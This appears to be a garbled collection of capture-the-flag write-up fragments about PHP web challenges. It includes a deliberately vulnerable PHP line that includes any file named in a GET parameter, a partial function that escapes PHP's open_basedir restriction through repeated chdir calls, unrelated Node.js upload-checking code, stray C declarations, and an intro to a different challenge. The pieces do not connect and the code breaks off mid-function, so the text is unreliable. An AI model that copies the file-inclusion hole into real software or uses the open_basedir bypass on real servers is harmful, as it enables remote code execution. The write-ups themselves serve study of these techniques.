Don't you think it is a baby challenge?
Object.keys(req.files).forEach(function(key){
var filename = req.files[key].name.toLowerCase();
var position = filename.lastIndexOf('.');
if (position == -1) {
return next();
}
var ext = filename.substr(position);
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
| <?php | |
| function bypass_open_basedir(){ | |
| if(!is_dir('/tmp/ab')){ | |
| mkdir('/tmp/ab'); | |
| } | |
| chdir('/tmp/ab'); | |
| ini_set('open_basedir','..'); | |
| chdir('..'); | |
| chdir('..'); | |
| chdir('..'); |
| 123; | |
| return 123; | |
| } | |
| extern void *opendir(const char *); | |
| extern void *readdir(void *); | |
| extern void *shmat(int, const void *, int); | |
| typedef struct { | |
| ino_t d_ino; | |
| off_t d_off; | |
| unsigned short d_reclen; |
The website is very simple, it can output what you input. So I call it Echohub.
But you can easily find a hint when you view the HTML source code.
